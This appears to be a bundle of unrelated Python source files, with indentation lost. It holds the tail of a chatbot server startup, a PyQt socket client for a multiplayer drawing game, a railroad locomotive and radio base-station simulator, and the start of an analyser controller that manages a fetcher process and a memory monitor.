app = run.configure_app(enable_api=True)
endpoints = AvailableEndpoints.read_endpoints(server_args.get("endpoints"))
# before_server_start handlers make sure the agent is loaded before the
# interactive learning IO starts
if server_args.get("model"):
app.register_listener(
partial(run.load_agent_on_start, server_args.get("model"), endpoints, None),
"before_server_start",
)
else:
app.register_listener(
partial(train_agent_on_start, server_args, endpoints, additional_arguments),
"before_server_start",
)
_serve_application(app, stories, skip_visualization)
if not skip_visualization and p is not None:
p.terminate() # pytype: disable=attribute-error
p.join() # pytype: disable=attribute-error
|
ConnectionHandler.py
|
import socket
import threading
import logging
import json
import sys
import time
from PyQt5 import QtWidgets, QtCore, QtGui
from . import SocketMsgHandler
from Utils.PopUpWindow import PopUpWindow
from Application.GameWindow import GameWindow
class ConnectionHandler(QtCore.QObject):
room_created_signal = QtCore.pyqtSignal(dict)
room_joined_signal = QtCore.pyqtSignal(dict)
chat_message_signal = QtCore.pyqtSignal(dict)
scoreboard_update_signal = QtCore.pyqtSignal(dict)
switch_window = QtCore.pyqtSignal(str)
start_game_signal = QtCore.pyqtSignal(dict)
word_selection_signal = QtCore.pyqtSignal(dict)
word_hint_signal = QtCore.pyqtSignal(dict)
player_left_signal = QtCore.pyqtSignal(dict)
player_joined_signal = QtCore.pyqtSignal(dict)
draw_stroke_signal = QtCore.pyqtSignal(dict)
undo_last_stroke_signal = QtCore.pyqtSignal()
clear_canvas_signal = QtCore.pyqtSignal()
guess_correct_signal = QtCore.pyqtSignal(dict)
artist_change_signal = QtCore.pyqtSignal(dict)
game_over_signal = QtCore.pyqtSignal(dict)
room_list_signal = QtCore.pyqtSignal(dict)
owner_changed_signal = QtCore.pyqtSignal(dict)
def __init__(self):
super().__init__()
self.connectedReceiverStatus = True
self.server_config = self._load_config_file()
self.SERVER = self.server_config['SERVER']
self.PORT = self.server_config['PORT']
self.ADDR = (self.SERVER, self.PORT)
self.conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.conn.connect(self.ADDR)
self.receiver_thread = threading.Thread(
target=self.receive, args=(self.conn, self.server_config)
)
self.receiver_thread.deamon = True
self.receiver_thread.start()
def kill_receiver(self):
try:
self.connectedReceiverStatus = False
self.conn.shutdown(socket.SHUT_RDWR)
self.conn.close()
self.receiver_thread.join()
except:
logging.debug('[SOCKET RECEIVER] Unsuccessful socket shutdown!')
logging.debug('[EXITING CONFIRMED] Killing all threads and exiting the client window')
def _load_config_file(self):
try:
config_path = sys.argv[1]
with open(config_path, 'r') as config_file:
return json.load(config_file)
except:
logging.error('[LOADING CONFIG FILE] Error occurred when loading configuration file!')
exit()
def is_connection_receiver_connected(self):
return self.connectedReceiverStatus
def receive(self, conn, server_config):
while self.connectedReceiverStatus:
logging.debug('[SOCKET RECEIVER] Awaiting for incoming messages ...')
received_msg_name = None
received_msg = None
try:
received_msg_name, received_msg = SocketMsgHandler.receive(conn, server_config)
if not received_msg:
continue
except:
logging.debug('[SOCKET RECEIVER] Shutting down and closing socket connection')
if received_msg_name == 'DrawStrokeBc':
logging.debug('[SOCKET RECEIVER] Received Message: {}'.format('DrawStrokeBc'))
else:
logging.debug('[SOCKET RECEIVER] Received Message: {}'.format(received_msg))
self.dispatch_received_message(received_msg)
def dispatch_received_message(self, received_msg):
message_dispatcher = {
'CreateRoomResp': self.handle_CreateRoomResp,
'JoinRoomResp': self.handle_JoinRoomResp,
'ChatMessageBc': self.handle_ChatMessageBc,
'StartGameResp': self.handle_StartGameResp,
'StartGameBc': self.handle_StartGameBc,
'ArtistPickBc': self.handle_ArtistPickBc,
'WordSelectionReq': self.handle_WordSelectionReq,
'DrawStrokeBc': self.handle_DrawStrokeBc,
'UndoLastStrokeBc': self.handle_UndoLastStrokeBc,
'ClearCanvasBc': self.handle_ClearCanvasBc,
'WordGuessedBc': self.handle_WordGuessedBc,
'FinishGameResp': self.handle_FinishGameResp,
'GameFinishedBc': self.handle_GameFinishedBc,
'GameRoomListResp': self.handle_GameRoomListResp,
'WordHintBc': self.handle_WordHintBc,
'UpdateScoreboardBc': self.handle_UpdateScoreboardBc,
'OwnerChangedBc': self.handle_OwnerChangedBc,
}
return message_dispatcher.get(received_msg['msg_name'], self.handle_UnrecognizedMessage)(
received_msg
)
def handle_CreateRoomResp(self, received_msg):
if received_msg['status'] == 'OK':
self.switch_window.emit(received_msg['room_code'])
self.room_created_signal.emit(received_msg)
else:
PopUpWindow('Room could not be created!', 'ERROR')
logging.debug('[MESSAGE DISPATCHER] handling CreateRoomResp failed, STATUS NOK')
logging.debug('[MESSAGE DISPATCHER] handling CreateRoomResp Successful, STATUS OK')
def handle_JoinRoomResp(self, received_msg):
with GameWindow.thread_lock:
if received_msg['status'] == 'OK':
# TODO: enhance window switching
self.switch_window.emit('Joining')
self.room_joined_signal.emit(received_msg)
else:
PopUpWindow('Could not join to room!\n{}'.format(received_msg['info']), 'ERROR')
logging.debug('[MESSAGE DISPATCHER] handling JoinRoomResp failed, STATUS NOK')
logging.debug('[MESSAGE DISPATCHER] handling JoinRoomResp Successful, STATUS OK')
def handle_ChatMessageBc(self, received_msg):
with GameWindow.thread_lock:
logging.debug(
'[MESSAGE DISPATCHER] handling ChatMessageBc {}: {}'.format(
received_msg['author'], received_msg['message']
)
)
self.chat_message_signal.emit(received_msg)
def handle_ExitClientReq(self, received_msg):
self.kill_receiver()
self.chat_message_signal.emit('{} has left the game'.format(received_msg['user_name']))
logging.debug('[MESSAGE DISPATCHER] handling ExitClientReq Successful, STATUS OK')
def handle_StartGameResp(self, received_msg):
logging.debug(
'[MESSAGE DISPATCHER] handling StartGameResp, STATUS {}'.format(received_msg['status'])
)
if received_msg['status'] == 'NOT_OK':
PopUpWindow(received_msg['info'], 'ERROR')
def handle_StartGameBc(self, received_msg):
logging.debug(
'[MESSAGE DISPATCHER] handling StartGameBc, Artist: {}'.format(received_msg['artist'])
)
self.start_game_signal.emit(received_msg)
self.artist_change_signal.emit(received_msg)
def handle_ArtistPickBc(self, received_msg):
logging.debug(
'[MESSAGE DISPATCHER] handling ArtistPickBc, Artist: {}'.format(received_msg['artist'])
)
self.artist_change_signal.emit(received_msg)
def handle_WordSelectionReq(self, received_msg):
logging.debug(
'[MESSAGE DISPATCHER] handling WordSelectionReq, Word List: {}'.format(
received_msg['word_list']
)
)
self.word_selection_signal.emit(received_msg)
def handle_DrawStrokeBc(self, received_msg):
logging.debug('[MESSAGE DISPATCHER] handling DrawStrokeBc')
self.draw_stroke_signal.emit(received_msg)
def handle_UndoLastStrokeBc(self, received_msg):
logging.debug('[MESSAGE DISPATCHER] handling UndoStrokeDrawBc')
self.undo_last_stroke_signal.emit()
def handle_ClearCanvasBc(self, received_msg):
logging.debug('[MESSAGE DISPATCHER] handling ClearCanvasBc')
self.clear_canvas_signal.emit()
def handle_WordGuessedBc(self, received_msg):
logging.debug('[MESSAGE DISPATCHER] handling WordGuessedBc')
self.guess_correct_signal.emit(received_msg)
logging.debug(
'[GUESS CORRECT] {} has guessed the word and gained {} points'.format(
received_msg['user_name'], received_msg['score_awarded'][received_msg['user_name']]
)
)
def handle_FinishGameResp(self, received_msg):
logging.debug('[MESSAGE DISPATCHER] handling FinishGameResp')
self.game_over_signal.emit(received_msg)
def handle_GameFinishedBc(self, received_msg):
logging.debug('[MESSAGE DISPATCHER] handling GameFinishedBc')
self.game_over_signal.emit(received_msg)
def handle_GameRoomListResp(self, received_msg):
logging.debug('[MESSAGE DISPATCHER] handling GameRoomListResp')
self.room_list_signal.emit(received_msg)
def handle_WordHintBc(self, received_msg):
logging.debug('[MESSAGE DISPATCHER] handling WordHintBc')
self.word_hint_signal.emit(received_msg)
def handle_OwnerChangedBc(self, received_msg):
logging.debug('[MESSAGE DISPATCHER] handling handle_OwnerChangedBc {}'.format(received_msg))
self.owner_changed_signal.emit(received_msg)
def handle_UpdateScoreboardBc(self, received_msg):
logging.debug(
'[MESSAGE DISPATCHER] handling handle_UpdateScoreboardBc {}'.format(received_msg)
)
self.scoreboard_update_signal.emit(received_msg)
def handle_UnrecognizedMessage(self, received_msg):
logging.debug(
'[MESSAGE DISPATCHER] No defined handler for message: {}'.format(received_msg)
)
def send_create_room_req(self, user_name):
send_create_room_req_msg = {'msg_name': 'CreateRoomReq', 'user_name': user_name}
SocketMsgHandler.send(self.conn, send_create_room_req_msg, self.server_config)
def send_join_room_req(self, user_name, room_code):
send_join_room_req_msg = {
'msg_name': 'JoinRoomReq',
'user_name': user_name,
'room_code': room_code,
}
SocketMsgHandler.send(self.conn, send_join_room_req_msg, self.server_config)
def send_chat_msg_req(self, user_name, room_code, message):
logging.debug('[CHAT MESSAGE] Sending message {}: {}'.format(user_name, message))
send_char_msg = {
'msg_name': 'ChatMessageReq',
'user_name': user_name,
'room_code': room_code,
'message': message,
}
SocketMsgHandler.send(self.conn, send_char_msg, self.server_config)
def send_exit_client_req(self, user_name, room_code):
notify_server_about_leaving = {
'msg_name': 'ExitClientReq',
'user_name': user_name,
'room_code': room_code,
}
SocketMsgHandler.send(self.conn, notify_server_about_leaving, self.server_config)
def send_socket_disconnect_req(self):
socket_disconnect_req = {'msg_name': 'DisconnectSocketReq'}
SocketMsgHandler.send(self.conn, socket_disconnect_req, self.server_config)
def send_start_game_req(self, user_name, room_code):
start_game_req = {
'msg_name': 'StartGameReq',
'user_name': user_name,
'room_code': room_code,
}
SocketMsgHandler.send(self.conn, start_game_req, self.server_config)
def send_word_selection_resp(self, user_name, room_code, selected_word):
logging.debug(
'[SENDING MESSAGE] WordSelectionResp, selected word = {}'.format(selected_word)
)
word_selection_resp = {
'msg_name': 'WordSelectionResp',
'user_name': user_name,
'room_code': room_code,
'selected_word': selected_word,
}
SocketMsgHandler.send(self.conn, word_selection_resp, self.server_config)
def send_draw_stroke_req(self, user_name, room_code, stroke_coordinates):
draw_stroke_req = {
'msg_name': 'DrawStrokeReq',
'user_name': user_name,
'room_code': room_code,
'stroke_coordinates': stroke_coordinates,
}
SocketMsgHandler.send(self.conn, draw_stroke_req, self.server_config)
def send_undo_last_stroke_req(self, user_name, room_code):
undo_last_stroke_req = {
'msg_name': 'UndoLastStrokeReq',
'user_name': user_name,
'room_code': room_code,
}
SocketMsgHandler.send(self.conn, undo_last_stroke_req, self.server_config)
def send_clear_canvas_req(self, user_name, room_code):
clear_canvas_req = {
'msg_name': 'ClearCanvasReq',
'user_name': user_name,
'room_code': room_code,
}
SocketMsgHandler.send(self.conn, clear_canvas_req, self.server_config)
def send_finish_game_req(self, user_name, room_code):
finish_game_req = {
'msg_name': 'FinishGameReq',
'user_name': user_name,
'room_code': room_code,
}
SocketMsgHandler.send(self.conn, finish_game_req, self.server_config)
def send_game_room_list_req(self):
game_room_list_req = {'msg_name': 'GameRoomListReq'}
SocketMsgHandler.send(self.conn, game_room_list_req, self.server_config)
if __name__ == '__main__':
pass
|
lib_track.py
|
""" PTC-Sim's collection of railroad component classes, including the track,
locomotives, base stations, etc., and the Track Simulator
Author: Dustin Fast, 2018
"""
import Queue
import multiprocessing
from time import sleep
from json import loads
from threading import Thread
from datetime import datetime
from ConfigParser import RawConfigParser
from math import degrees, radians, sin, cos, atan2
from lib_app import track_log
from lib_app import REFRESH_TIME
from lib_messaging import Connection, get_6000_msg
from lib_messaging import MSG_INTERVAL, LOCO_EMP_PREFIX
# Import conf data
config = RawConfigParser()
config.read('app_config.dat')
TRACK_RAILS = config.get('track', 'track_rails')
TRACK_LOCOS = config.get('track', 'track_locos')
TRACK_BASES = config.get('track', 'track_bases')
SPEED_UNITS = config.get('track', 'speed_units')
CONN_TIMEOUT = int(config.get('track', 'component_timeout'))
############################
# Top-Level/Parent Classes #
############################
class DeviceSim(object):
""" A collection of threads representing a device simulation. Exposes start
and stop interfaces.
Assumes each thread implements self.running (a bool) as a poison pill.
"""
def __init__(self, device, targets=[]):
self.running = False # Thread kill signal
self._thread_targets = targets
self._threads = []
self.device = device
self.label = device.name
self.time_iplier = 1 # (float) Time speed up/slow down
def start(self):
""" Starts the simulation threads.
"""
if not self.running:
self.running = True
self._threads = [Thread(target=t, args=[self.device])
for t in self._thread_targets]
[t.start() for t in self._threads]
def stop(self):
""" Stops the simulation threads.
"""
if self.running:
print('* Stopped sim thread ' + self.label)
self.running = False # Thread poison pill
[t.join(timeout=REFRESH_TIME) for t in self._threads]
class TrackDevice(object):
""" The template class for on-track, communication-enabled devices. I.e.,
Locos, Bases, and Waysides. Each devices contains a type-specific,
real-time activity and communications simulation for testing and
demonstration purposes.
"""
def __init__(self, ID, device_type, location=None):
""" self.ID : (str) The Device's unique identifier
self.coords : (Location) The devices location, as a Location
self.conns : (dict) Connection objects - { ID: Connection }
self.sim : The device's simulation. Start w/self.sim.start()
"""
self.ID = ID
self.devtype = device_type
self.name = device_type + ' ' + self.ID
self.coords = location
self.conns = {}
self.sim = None
def __str__(self):
""" Returns a string representation of the device """
return self.name
def add_connection(self, connection):
""" Adds the given Connection instance to the devices's connections.
"""
self.conns[connection.ID] = connection
def connected(self):
""" Returns True iff at least one of the device's connections is active.
"""
if [c for c in self.conns.values() if c.connected()]:
return True
def disconnect(self):
""" Sets all the devices connections to an unconnected status.
"""
[c.disconnect() for c in self.conns.values()]
#################
# Child Classes #
#################
class Loco(TrackDevice):
""" An abstration of a locomotive. Includes a realtime simulation of its
activity/communications.
"""
def __init__(self, ID, track):
""" self.ID : (str) The Locomotives's unique identifier
self.track : (Track) Track object ref
self.speed : (float) Current speed
self.heading : (float) Current compass bearing
self.direction : (str) Either 'increasing' or 'decreasing'
self.coords : (Location) Current location, as a Location
self.bpp : (float) Brake pipe pressure. Affects braking.
self.bases_inrange: (list) Base objects within communication range
"""
TrackDevice.__init__(self, str(ID), 'Loco')
self.emp_addr = LOCO_EMP_PREFIX + self.ID
self.track = track
self.speed = None
self.heading = None
self.direction = None
self.coords = None
self.bpp = None
self.bases_inrange = []
self.bases = []
self.conns = {'Radio 1': Connection('Radio 1', timeout=CONN_TIMEOUT),
'Radio 2': Connection('Radio 2', timeout=CONN_TIMEOUT)}
self.sim = DeviceSim(self,
[TrackSim.loco_movement,
TrackSim.loco_messaging])
def update(self,
speed=None,
heading=None,
direction=None,
location=None,
bpp=None,
bases=None):
""" speed: A float, locos current speed.
heading: A float, locos current compass bearing.
direction: Either 'increasing', or 'decreasing'.
location: A Location denoting Locos current location.
bpp: A float, denoting current brake pipe pressure.
bases: A dict denoting current base connections. Is of the
format: { ConnectionLabel: base_ID }
"""
if speed is not None:
self.speed = speed
if heading is not None:
self.heading = heading
if direction is not None:
self.direction = direction
if location is not None:
self.coords = location
if bpp is not None:
self.bpp = bpp
if bases is not None:
if not bases:
[c.disconnect for c in self.conns]
return
try:
for conn_label, base_id in bases.iteritems():
self.conns[conn_label].connect(self.track.bases[base_id])
except KeyError:
err_str = ' - Invalid connection or base ID in bases param.'
raise ValueError(self.name + err_str)
class Base(TrackDevice):
""" An abstraction of a 220 MHz base station, including it's coverage area.
Includes a realtime simulation of its activity/communications.
"""
def __init__(self, ID, coverage_start, coverage_end, location):
""" self.ID = (String) The base station's unique identifier
self.cov_start = (float) Coverage start location
self.cov_end = (float) Coverage end location
self.coords = (Location) Location of this base station
"""
TrackDevice.__init__(self, ID, 'Base')
self.cov_start = coverage_start
self.cov_end = coverage_end
self.coords = location
def covers_location(self, location):
""" Given a location, returns True if this base provides
coverage at that location, else returns False.
"""
r = location.marker >= self.cov_start and location.marker <= self.cov_end
return location.marker >= self.cov_start and location.marker <= self.cov_end
class Wayside(TrackDevice):
""" An abstraction of a wayside. Includes a realtime simulation of its
activity/communications.
"""
def __init__(self, ID, location, children={}):
""" self.ID : (str) The waysides unique ID/address
self.coords: (Location) The waysides location as a Location
self.children: (dict) Child devices { CHILD_ID: CHILD_OBJECT }
"""
raise NotImplementedError
# TrackDevice.__init__(self, ID, 'Wayside')
# self.children = {}
def add_child(self, child_object):
""" Given a child object (i.e. a switch), adds it to the wayside as a
device.
"""
raise NotImplementedError
# self.children[child_object.ID] = child_object
class TrackSwitch(TrackDevice):
""" An abstraction of an on-track directional switch.
Includes a realtime simulation of its activity/communications.
"""
def __init__(self, ID, location):
"""
"""
raise NotImplementedError
# TrackDevice.__init__(self, ID, 'Switch')
# self.status = None
def get_position(self):
""" Returns a string represenation of the devices status.
"""
raise NotImplementedError
##############################
# Terminal Top-level Classes #
##############################
class Track(object):
""" A representation of the track, including its locations and radio base
stations (contains lists/dicts of these objects in convenient forms).
self.locos = A dict of locootives, by loco ID
Format: { LOCOID: LOCO_OBJECT }
self.bases = A dict of radio base stations, by base ID
Format: { BASEID: BASE_OBJECT }
self.mileposts = A dict of all track mileposts, by marker number
Format: { MP: LOCATIONOBJECT }
self.mileposts_sorted = A list of all track mileposts, sorted by marker
Format: [ LOCATIONOBJECT_1, ... , LOCATIONOBJECT_N ]
self.marker_linear = Numerical milepost markers in ascending order
Format: [ MP_1, ... , MP_n ], where MP1 < MPn
self.marker_linear_rev = Numerical milepost markers in descending order
Format: [ MP_n, ... , MP_1], where MP1 < MPn
Note: BASEID/LOCOD = strings, MP = floats
"""
def __init__(self,
track_file=TRACK_RAILS,
locos_file=TRACK_LOCOS,
bases_file=TRACK_BASES):
""" track_file: Track JSON representation
locos_file: Locos JSON representation
bases_file: Base stations JSON representation
"""
# On-Track device properties
self.locos = {}
self.bases = {}
self.last_seen = {} # Last msg recv time, by device:
# { DeviceType: { ID: DateTime } }
# Track properties
self.mileposts = {}
self.mileposts_sorted = []
self.marker_linear = []
self.marker_linear_rev = []
# self.restrictions = {} # { AUTH_ID: ( START_MILEPOST, END_MILEPOST }
# Populate bases station (self.bases) from base_file
try:
with open(bases_file) as base_data:
bases = loads(base_data.read())
except Exception as e:
raise Exception('Error reading ' + bases_file + ': ' + str(e))
for base in bases:
try:
base_id = str(base['id'])
coverage_start = float(base['coverage'][0])
coverage_end = float(base['coverage'][1])
mp = base_id # base ids denote location
lat = float(base['lat'])
lng = float(base['long'])
except ValueError:
raise ValueError('Conversion error in ' + bases_file + '.')
except KeyError:
raise Exception('Malformed ' + bases_file + ': Key Error.')
self.bases[base_id] = Base(base_id,
coverage_start,
coverage_end,
Location(mp, lat, lng))
# Populate milepost objects (self.mileposts) from track_file
try:
with open(track_file) as rail_data:
locations = loads(rail_data.read())
except Exception as e:
raise Exception('Error reading ' + track_file + ': ' + str(e))
for marker in locations:
try:
mp = float(marker['milemarker'])
lat = float(marker['lat'])
lng = float(marker['long'])
except ValueError:
raise ValueError('Conversion error in ' + track_file + '.')
except KeyError:
raise Exception('Malformed ' + track_file + ': Key Error.')
self.mileposts[mp] = Location(mp, lat, lng)
coverage = [b for b in self.bases.values()
if b.covers_location(self.mileposts[mp])]
self.mileposts[mp].covered_by = coverage
# Build the other milepost lists/dicts from self.mileposts
self.marker_linear = [m for m in sorted(self.mileposts.keys())]
self.marker_linear_rev = self.marker_linear[::-1]
sorted_objs = [m for m in
sorted(self.mileposts.values(), key=lambda x: x.marker)]
self.mileposts_sorted = sorted_objs
# Populate Locomotive objects (self.locos) from locos_file
try:
with open(locos_file) as loco_data:
locos = loads(loco_data.read())
except Exception as e:
raise Exception('Error reading ' + locos_file + ': ' + str(e))
for loco in locos:
try:
mp = loco['lastmilepost']
try:
loco_location = self.mileposts[mp]
except KeyError:
print(self.mileposts[0])
raise Exception('Invalid milepost encountered: ' + str(mp))
loco_id = str(loco['id']) # Ensure string ID
loco_obj = Loco(loco_id, self)
loco_obj.update(speed=loco['lastspeed'],
heading=loco['lastheading'],
direction=loco['lastdirection'],
location=loco_location,
bpp=loco['lastbpp'])
self.locos[loco_id] = loco_obj
except KeyError:
raise Exception('Malformed ' + locos_file + ': Key Error.')
def _get_next_mp(self, curr_mp, distance):
""" Given a curr_mp and distance, returns the nearest mp marker at
curr_mp + distance. Also returns any difference not accounted
for.
Accepts:
curr_mp = Curr location (a Location)
distance = Distance in miles (neg dist denotes decreasing DOT)
Returns:
next_mp = nearest mp for curr_mp + distance without going over
dist_diff = difference between next_mp and actual location
Note: If next_mp = curr_mp, diff = distance.
If no next mp (end of track), returns None.
"""
# If no distance, next_mp is curr_mp
if distance == 0:
return curr_mp, distance
# Working vars
mp = curr_mp.marker
target_mp = mp + distance
dist_diff = 0
next_mp = None
# Set the location object list to iterate, depending on direction
if distance > 0:
mps = self.marker_linear
elif distance < 0:
mps = self.marker_linear_rev
# Find next mp marker, noting any unconsumed distance for next time
for i, marker in enumerate(mps):
if marker == target_mp:
next_mp = marker
dist_diff = 0
break
elif (distance > 0 and marker > target_mp) or \
(distance < 0 and marker < target_mp):
next_mp = mp
if i > 0:
next_mp = mps[i - 1]
dist_diff = abs(target_mp - next_mp)
break
# Get mp object associated with next_mp
next_mp_obj = self.get_location_at(next_mp)
# debug
# if not next_mp_obj:
# debug_str = '_get_next_mp failed to find a next location from: '
# debug_str += str(mps) + '\n'
# debug_str += 'cur_mp: ' + str(mp) + '\n'
# debug_str += 'moved : ' + str(distance) + '\n'
# debug_str += 'tgt_mp: ' + str(target_mp) + '\n'
# debug_str += 'mp_idx: ' + str(i) + '\n'
# debug_str += 'nxt_mp: ' + str(next_mp) + '\n'
# debug_str += 'disdif: ' + str(dist_diff) + '\n'
# raise Exception(debug_str)
return next_mp_obj, dist_diff
def get_location_at(self, mile):
""" Returns the Location at the given track mile (a float) iff exists.
"""
return self.mileposts.get(mile, None)
def set_lastseen(self, device):
""" Given a TrackDevice, updates the Track.last_seen with the current
datetime for that device.
"""
if not self.last_seen.get(device.devtype):
self.last_seen[device.devtype] = {}
self.last_seen[device.devtype][device.ID] = datetime.now()
def get_lastseen(self, device):
""" Returns last comms time (datetime) for the given device iff exists.
"""
try:
return self.last_seen[device.devtype][device.ID]
except:
pass
class Location:
""" An abstraction of a location.
"""
def __init__(self, marker, latitude, longitude, covered_by=[]):
""" self.marker = (float) The numeric location marker
self.lat = (float) Latitude of location
self.long = (float) Longitude of location
self.covered_by = (list) Bases covering this location
"""
self.marker = marker
self.lat = latitude
self.long = longitude
self.covered_by = covered_by
def __str__(self):
""" Returns a string representation of the location.
"""
coord_str = str(self.marker)
coord_str += ' (' + str(self.lat) + ',' + str(self.long) + ')'
return coord_str
##############
# Track Sim #
##############
class TrackSim(multiprocessing.Process):
""" The Track Simulator. Simulates a locomotives traveling on the track and
sending/receiving EMP msgs over on-track communications infrastructure,
which is also simulated here.
"""
def __init__(self):
multiprocessing.Process.__init__(self)
self.timeq = multiprocessing.Queue() # Input queue for "time speed"
def run(self):
track_log.info('Track Sim Starting...')
track = Track() # The track contains all it's devices and locos.
# Start each track component-device's simulation thread
# These devices exists "on" the track and simulate their own
# operation.
# TODO: Bases, Waysides, etc
for l in track.locos.values():
l.sim.start()
# Update sim time multiplier if needed
while True:
try:
time_iplier = self.timeq.get(timeout=.1)
for l in track.locos.values():
l.sim.time_iplier = time_iplier
track_log.info('Time Multiplier Set: ' + str(time_iplier))
except Queue.Empty:
pass
# debug
# for l in track.locos.values():
# status_str = 'Loco ' + l.ID + ': '
# status_str += str(l.speed) + ' @ ' + str(l.coords.marker)
# status_str += ' (' + str(l.coords.long) + ',' + str(l.coords.lat) + ')'
# status_str += '. Bases in range: '
# status_str += ', '.join([b.ID for b in l.bases_inrange])
# status_str += ' Conns: '
# status_str += ', '.join([c.conn_to.ID for c in l.conns.values() if c.conn_to])
# track_log.info(status_str)
sleep(REFRESH_TIME)
@staticmethod
def loco_movement(loco):
""" Real-time simulation of a locomotive's on-track movement. Also
determines base stations in range of locos current position.
This function is intended to be run as a Thread.
"""
def _brake():
""" Apply the adaptive braking algorithm.
"""
raise NotImplementedError
def _set_heading(prev_mp, curr_mp):
""" Sets loco heading based on current and prev lat/long
"""
lat1 = radians(prev_mp.lat)
lat2 = radians(curr_mp.lat)
long_diff = radians(prev_mp.long - curr_mp.long)
a = cos(lat1) * sin(lat2)
b = (sin(lat1) * cos(lat2) * cos(long_diff))
x = sin(long_diff) * cos(lat2)
y = a - b
deg = degrees(atan2(x, y))
compass_bearing = (deg + 360) % 360
loco.heading = compass_bearing
# Start
makeup_dist = 0
if not loco.direction or not loco.coords or loco.speed is None:
raise ValueError('Cannot simulate an unintialized Locomotive.')
while loco.sim.running:
sleep(MSG_INTERVAL) # Sleep for specified interval
# Move, if at speed
if loco.speed > 0:
# Determine dist traveled since last iteration, including
# makeup distance, if any.
hours = REFRESH_TIME / 3600.0 # Seconds to hours, for mph
hours = loco.sim.time_iplier * hours # Apply sim time rate
dist = loco.speed * hours * 1.0 # distance = speed * time
dist += makeup_dist
# Set sign of dist based on dir of travel
if loco.direction == 'decreasing':
dist *= -1
# Get next location and any makeup distance
new_mp, dist = loco.track._get_next_mp(loco.coords, dist)
# If no new_mp was returned, assume end of track
if not new_mp:
err_str = ' - At end of track. Reversing.'
track_log.info(loco.name + err_str)
makeup_dist = 0
if loco.direction == 'decreasing':
loco.direction = 'increasing'
else:
loco.direction = 'decreasing'
# Else update the loco accordingly
else:
_set_heading(loco.coords, new_mp)
loco.coords = new_mp
makeup_dist = dist
# Determine base stations in range of current position
loco.bases_inrange = [b for b in loco.track.bases.values()
if b.covers_location(loco.coords)]
@staticmethod
def loco_messaging(loco):
""" Real-time simulation of a locomotives's messaging system. Maintains
connections to bases in range of loco's position.
# TODO: send/fetch msgs over them.
This function is intended to be run as a Thread.
"""
while loco.sim.running:
sleep(MSG_INTERVAL) # Sleep for specified interval
# Drop all out of range base connections and keep alive existing
# in-range connections
lconns = loco.conns.values()
for conn in [c for c in lconns if c.connected() is True]:
if conn.conn_to not in loco.bases_inrange:
conn.disconnect()
else:
conn.keep_alive()
open_conns = [c for c in lconns if c.connected() is False]
used_bases = [c.conn_to for c in lconns if c.connected() is True]
for i, conn in enumerate(open_conns):
try:
if loco.bases_inrange[i] not in used_bases:
conn.connect(loco.bases_inrange[i])
except IndexError:
break # No (or no more) bases in range to consider
# Ensure at least one active connection
conns = [c for c in lconns if c.connected() is True]
if not conns:
err_str = ' skipping msg send/recv - No active comms.'
track_log.warn(loco.name + err_str)
continue # Try again next iteration
# Send status msg over active connections, breaking on first success.
status_msg = get_6000_msg(loco)
for conn in conns:
try:
conn.send(status_msg)
info_str = ' - Sent status msg over ' + conn.conn_to.name
track_log.info(loco.name + info_str)
except Exception as e:
track_log.warn(loco.name + ' send failed: ' + str(e))
# Fetch incoming cad msgs over active connections, breaking on success.
for conn in conns:
cad_msg = None
try:
cad_msg = conn.fetch(loco.emp_addr)
except Queue.Empty:
break # No msgs (or no more msgs) to receive.
except Exception as e:
track_log.warn(loco.name + ' fetch failed: ' + str(e))
continue # Try the next connecion
# Process cad msg, if msg and if actually for this loco
if cad_msg and cad_msg.payload.get('ID') == loco.ID:
try:
# TODO: Update track restrictions/loco locations
track_log.info(loco.name + ' - CAD msg processed.')
except:
track_log.error(loco.name + ' - Received invalid CAD msg.')
break # Either way, the msg was fetched # TODO: ACK w/broker
else:
err_str = ' - active connections exist, but msg fetch/recv failed.'
track_log.error(loco.name + err_str)
@staticmethod
def base_messaging(self):
""" Real-time simulation of a base station's messaging system
"""
raise NotImplementedError
@staticmethod
def wayside_messaging(self):
""" Real-time simulation of a wayside's messaging system
"""
raise NotImplementedError
# debug:
# if __name__ == '__main__':
# sim = TrackSim()
# sim.start()
|
analyser_controller.py
|
# -*- coding: utf-8 -*-
'''
This module controls the fetcher and analyser. It also starts
a thread that monitors the memory usage in the analyser process.
'''
from __future__ import (absolute_import, division,
print_function, unicode_literals)
import threading
import multiprocessing
import Queue
import logging
import types
import psutil
import time
import commands
from . import config_util, ipc
from .exception import SnapshotException
class AnalyserController(object):
'''Controller class that starts a fetcher process and
a memory monitor thread that periodically checks memory
usage of the ananlyser process'''
def __init__(self, pf_queue, router, config,
mem_mon_params, memory_params):
self.config = config
self.queue_triple = None
self.node = None
self.router = router
self.drop = False
self.pf_queue = pf_queue
self.fetcher = None
self.fetcher_stop_event = multiprocessing.Event()
self.snapshot_event = multiprocessing.Event()
self.analyser = None
self.query = None
self.mem_monitor = None
self.mem_mon_stop_event = threading.Event()
self.mem_mon_params = mem_mon_params
self.memory_params = memory_params
self.neo4j_params = config_util.safe_read_config(self.config,
"NEO4J_PARAMS")
def _handle_command(self, msg):
cmd = msg.cont
if cmd['cmd'] == 'status':
ret = {}
try:
ret['num_msgs'] = self.analyser.event_orderer.get_queue_size()
except AttributeError:
pass
try:
ret['inbound_rate'] = self.analyser.inbound.rate
ret['outbound_rate'] = self.analyser.outbound.rate
except AttributeError:
pass
return ret
elif cmd['cmd'] == "exec_qry_method":
return self.query(cmd)
def start_service(self):
'''Starts the fetcher process and memory monitor thread'''
self._start_fetcher()
self._start_mem_monitor()
def _start_fetcher(self):
'''Initialises fetcher process specific members and
starts the fetcher'''
self.queue_triple = self.router.add("ANALYSER",
queue_class=multiprocessing.Queue,
queue_triple=True)
self.fetcher_stop_event.clear()
self.snapshot_event.clear()
self.fetcher = multiprocessing.Process(name='fetcher',
target=self._run_fetcher)
self.fetcher.start()
if __debug__:
logging.debug("Started fetcher process with pid: %d",
self.fetcher.pid)
def _start_mem_monitor(self):
'''Initialises and starts the memory monitor thread'''
if not self.mem_mon_params['mon_status']:
logging.info("Memory monitor thread is not set to ON status. "
"Cannot start thread")
return
self.mem_mon_stop_event.clear()
self.mem_monitor = threading.Thread(name='mem_monitor',
target=self._run_mem_monitor)
self.mem_monitor.start()
if __debug__:
logging.debug("Started the memory monitor thread")
def _run_fetcher(self):
'''Runs the fetcher process loop'''
import jpype
from . import analysis
from . import query
self.node = ipc.Worker(ident="ANALYSER",
queue_triple=self.queue_triple,
handler=self._handle_command,
queue_class=multiprocessing.Queue)
self.node.run_forever()
neo4j_cfg = {}
neo4j_cfg['neo4j_cfg'] = self.neo4j_params
